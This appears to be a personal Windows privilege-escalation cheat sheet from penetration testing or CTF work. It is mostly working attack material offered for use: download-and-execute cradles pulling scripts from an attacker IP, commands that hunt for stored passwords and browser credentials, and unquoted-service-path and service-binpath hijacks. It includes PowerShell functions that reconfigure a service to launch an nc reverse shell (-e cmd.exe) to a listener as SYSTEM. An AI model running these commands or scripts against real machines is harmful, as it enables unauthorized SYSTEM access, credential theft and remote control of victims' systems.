Windows Priv Esc

When serving files for download to Windows targets, host them with python3 -m http.server 80: fetching from port 80 works where a non-standard port such as 9000 fails, because outbound traffic from the target is often limited to common ports

on the Win machine do:

certutil.exe -urlcache -f http://<attackingIP>/winpeas.exe winpeas.exe   (certutil is a well-known LOLBin, so expect AV/EDR to flag the download)

Search for service binary paths that are unquoted and contain spaces (e.g. C:\Program Files\Some App\svc.exe). Windows tries each space-delimited prefix in turn (C:\Program.exe, then C:\Program Files\Some.exe, ...) before the real executable, so if we can write to one of those directories we can drop a malicious exe there and it runs with the service's privileges (usually SYSTEM) the next time the service starts: on reboot for auto-start services, or immediately if we also hold the right to stop and start the service.
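The check described above, as an added PowerShell example that is not part of the original notes: it lists services whose ImagePath is unquoted and contains a space, computes every shortened path the service control manager will try before the real one, and tests whether the current user can write to each of those directories by creating and deleting a probe file. Function names are this example's own; Get-CimInstance needs PowerShell 3.0 or later (Get-WmiObject Win32_Service gives the same fields on older hosts).

```powershell
# Added example, not from the original notes: list unquoted service paths and
# test which of the directories Windows will search first are writable.

function Test-DirectoryWritable {
    param([string]$Path)
    # Creating a real file is the reliable test: reading ACLs alone misses
    # inherited denies and integrity labels. The probe is removed at once.
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    $probe = Join-Path $Path ([System.IO.Path]::GetRandomFileName())
    try {
        [System.IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Find-UnquotedServicePath {
    [CmdletBinding()]
    param()
    # Keep services whose path is not already quoted, is not under the
    # (non-writable) Windows directory, and contains at least one space.
    $services = Get-CimInstance -ClassName Win32_Service | Where-Object {
        $_.PathName -and
        $_.PathName -notmatch '^"' -and
        $_.PathName -notmatch '^[A-Za-z]:\\Windows\\' -and
        $_.PathName -match ' '
    }

    foreach ($svc in $services) {
        # Drop any arguments that follow the executable name
        $exe = $svc.PathName
        if ($exe -match '^(.*?\.exe)') { $exe = $Matches[1] }

        # Each prefix that ends at a space is tried before the real path:
        # C:\Program Files\Foo Bar\svc.exe -> C:\Program.exe, C:\Program Files\Foo.exe
        $parts = $exe -split ' '
        for ($i = 1; $i -lt $parts.Count; $i++) {
            $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
            $dir = Split-Path -Parent $candidate
            [PSCustomObject]@{
                Service   = $svc.Name
                StartMode = $svc.StartMode
                RunAs     = $svc.StartName
                ImagePath = $svc.PathName
                Candidate = $candidate
                Writable  = Test-DirectoryWritable -Path $dir
            }
        }
    }
}

# Usage: only the rows where a binary can be planted. An auto-start service
# picks it up on the next boot; otherwise restart the service if we are allowed to.
Find-UnquotedServicePath | Where-Object Writable | Format-Table -AutoSize
```

A row with Writable = True and RunAs = LocalSystem is the target: copy the payload to the Candidate path exactly as printed (the name matters, since that is the file Windows looks for) and then trigger a start of that service.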

systeminfo

  • gathers OS name and version, build, architecture, installed hotfixes and domain/workgroup details; save the output, Windows Exploit Suggester takes it as input

Run the Sherlock PowerShell script (rasta-mouse) to search for missing patches with known priv esc exploits

Execute Sherlock on the affected system by loading it in memory with the following PowerShell download cradle, then call Find-AllVulns:

IEX(New-Object Net.Webclient).downloadString('http://10.10.14.2:8000/Sherlock.ps1')

IEX - Invoke-Expression; it runs the downloaded script text without writing it to disk

8000 - the default port of python -m SimpleHTTPServer (Python 2) or python3 -m http.server, which we use to host the script on our system (switch to port 80 if 8000 is blocked)

10.10.14.2 - this is our attacking system's IP in this case

Sherlock is no longer maintained and only knows older CVEs; Watson by the same author is its replacement for newer Windows builds

  • pass the hash

Enumerate Powershell version

$PSVersionTable.PSVersion

How to view hidden files in Windows

attrib   (lists file attributes: H marks hidden and S system files)

Windows Exploit Suggester (python script; unmaintained, WES-NG is the maintained successor and takes the same systeminfo output)

./windows-exploit-suggester.py --update

  • first update the database (downloads the Microsoft security bulletin spreadsheet as a dated .xls file)

./windows-exploit-suggester.py --database <the .xls file written by the above command> --systeminfo <path to a text file holding the target's systeminfo output>

Check for missing patches on the system

wmic qfe get Caption,Description,HotFixID,InstalledOn

  • use the above command to list the installed patches and hotfixes, then compare them with the patches that fix known privilege escalation bugs for this OS version: a missing KB means the matching exploit is worth trying

    • search exploit-db for this (searchsploit on Kali)

run PowerUp (Will Schroeder, part of PowerSploit); Invoke-AllChecks runs every check

checks many things including:

  • hijackable DLLs

  • unattended install files

  • modifiable services

  • unquoted service paths

  • AlwaysInstallElevated

  • and more

Look for creds on the system

Browser creds (Metasploit post modules, run from a meterpreter session)

post/windows/gather/enum_ie

post/windows/gather/enum_chrome

etc.

Putty, WinSCP, RDP creds

SessionGopher (FireEye)

run Hot Potato (foxglovesec)

NBNS spoofing, a fake WPAD proxy and an HTTP-to-SMB NTLM relay back to the local machine to run a command as SYSTEM. Fixed by MS16-075, so it only works on unpatched hosts; the later Potato variants (Rotten/Juicy Potato) are the follow-on for patched builds

-----------------------------------------------------------------------------------------------------

// What system are we connected to?

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

// Get the hostname and username (if available)

hostname

echo %username%

// Get users

net users

net user [username]

// Networking stuff

ipconfig /all

// Printer?

route print

// ARP-arific

arp -a

// Active network connections

netstat -ano

// Firewall fun (Win XP SP2+ only; "netsh firewall" is deprecated from Vista on, where "netsh advfirewall show allprofiles" is the replacement)

netsh firewall show state

netsh firewall show config

// Scheduled tasks

schtasks /query /fo LIST /v

// Running processes to started services

tasklist /SVC

net start

// Driver madness

DRIVERQUERY

// WMIC fun (Win 7/8 -- XP requires admin; wmic is deprecated on current Windows, Get-CimInstance is the PowerShell replacement)

wmic /?

# Use wmic_info script!

// WMIC: check patch level

wmic qfe get Caption,Description,HotFixID,InstalledOn

// Search patches for a given KB

wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."

// AlwaysInstallElevated fun (both keys must exist and be REG_DWORD 1; then any .msi a standard user installs runs as SYSTEM)

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

// Other commands to run to hopefully get what we need

dir /s *pass* == *cred* == *vnc* == *.config*

findstr /si password *.xml *.ini *.txt

reg query HKLM /f password /t REG_SZ /s

reg query HKCU /f password /t REG_SZ /s

// Service permissions

sc query

sc qc [service_name]

// Accesschk stuff

accesschk.exe /accepteula (always do this first!!!!!) ***From my experience I must include this in every command

accesschk.exe -ucqv [service_name] (requires sysinternals accesschk!)

accesschk.exe -uwcqv "Authenticated Users" * (won't yield anything on Win 8)

accesschk.exe -ucqv * (everything)

// Find all weak folder permissions per drive.

accesschk.exe -uwdqs Users c:\

accesschk.exe -uwdqs "Authenticated Users" c:\

// Find all weak file permissions per drive.

accesschk.exe -uwqs Users c:\*.*

accesschk.exe -uwqs "Authenticated Users" c:\*.*

// Binary planting (needs change-config rights on the service from the checks above; note the original binpath from sc qc first so it can be restored)

sc config [service_name] binpath= "C:\nc.exe -nv [RHOST] [RPORT] -e C:\WINDOWS\System32\cmd.exe"

sc config [service_name] obj= ".\LocalSystem" password= ""

sc qc [service_name] (to verify!)

net start [service_name]
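The service-permission check and the binpath swap above, combined into one added PowerShell example (not from the original notes and not PowerUp's code): Get-ModifiableService reads each service's security descriptor with sc sdshow, parses the SDDL, and reports services where an allow ACE for the current user or one of its groups carries SERVICE_CHANGE_CONFIG, WRITE_DAC, WRITE_OWNER or a generic write/all right; Invoke-ServiceBinPathHijack then does what the sc config / net start lines do, but records the original binpath and puts it back. Function names, the service name VulnSvc and the 10.10.14.2:4444 listener in the usage lines are this example's own placeholders.

```powershell
# Added example, not from the original notes or from PowerUp: find services the
# current user can reconfigure, then perform the binpath swap with a restore.

# Access bits (service-specific and generic) that let the holder change binPath
# directly or rewrite the DACL to grant it.
$InterestingRights = @{
    SERVICE_CHANGE_CONFIG = 0x00000002
    WRITE_DAC             = 0x00040000
    WRITE_OWNER           = 0x00080000
    GENERIC_ALL           = 0x10000000
    GENERIC_WRITE         = 0x40000000
}

function Get-ModifiableService {
    [CmdletBinding()]
    param()
    $me   = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $sids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })

    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        # 'sc sdshow' prints the service security descriptor as SDDL; keep the D: line
        $sddl = sc.exe sdshow $svc.Name 2>$null |
            Where-Object { $_ -match '^D:' } | Select-Object -First 1
        if (-not $sddl) { continue }
        $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl)
        foreach ($ace in $sd.DiscretionaryAcl) {
            # Only allow ACEs for one of our SIDs count; an earlier deny ACE can
            # still override, so confirm with accesschk -ucqv before relying on it.
            if ($ace.AceType -ne 'AccessAllowed') { continue }
            if ($sids -notcontains $ace.SecurityIdentifier.Value) { continue }
            $granted = $InterestingRights.GetEnumerator() |
                Where-Object { ($ace.AccessMask -band $_.Value) -ne 0 } |
                ForEach-Object { $_.Key }
            if ($granted) {
                [PSCustomObject]@{
                    Service   = $svc.Name
                    RunAs     = $svc.StartName
                    StartMode = $svc.StartMode
                    State     = $svc.State
                    Trustee   = $ace.SecurityIdentifier.Value
                    Rights    = ($granted -join ',')
                    BinPath   = $svc.PathName
                }
            }
        }
    }
}

function Invoke-ServiceBinPathHijack {
    param(
        [Parameter(Mandatory)][string]$Name,
        # Command the SCM will launch as the service account, e.g. (placeholder IP/port)
        # 'C:\nc.exe -nv 10.10.14.2 4444 -e C:\Windows\System32\cmd.exe'
        [Parameter(Mandatory)][string]$Command,
        [switch]$RunAsLocalSystem
    )
    $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='$Name'"
    if (-not $svc) { throw "Service '$Name' not found" }
    $originalPath = $svc.PathName
    $originalUser = $svc.StartName

    try {
        # Use sc.exe, not sc: inside PowerShell 'sc' is an alias for Set-Content.
        # sc.exe needs the space after 'binpath=' / 'obj=' / 'password='.
        sc.exe config $Name binpath= "$Command" | Out-Null
        if ($RunAsLocalSystem) {
            sc.exe config $Name obj= "LocalSystem" password= "" | Out-Null
        }
        sc.exe qc $Name                                   # verify what we just set
        if ($svc.State -eq 'Running') {
            sc.exe stop $Name | Out-Null
            Start-Sleep -Seconds 3
        }
        # A shell is not a real service, so this returns error 1053 (timeout)
        # after about 30 s; by then the command has already run as the service account.
        sc.exe start $Name | Out-Null
    }
    finally {
        # Restore the original configuration. obj= restores without a password for
        # LocalSystem/LocalService/NetworkService; a real user account needs password= too.
        sc.exe config $Name binpath= "$originalPath" | Out-Null
        if ($RunAsLocalSystem) { sc.exe config $Name obj= "$originalUser" | Out-Null }
    }
}

# Usage (placeholder service name, listener IP and port):
# Get-ModifiableService | Format-Table -AutoSize
# Invoke-ServiceBinPathHijack -Name 'VulnSvc' -RunAsLocalSystem `
#     -Command 'C:\nc.exe -nv 10.10.14.2 4444 -e C:\Windows\System32\cmd.exe'
```

Start the nc listener before calling the hijack. Because the SCM may terminate a process that never reports itself as a started service, a shell obtained this way can die quickly; a payload built as a proper service executable (msfvenom -f exe-service) or one that spawns a detached child process avoids that.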
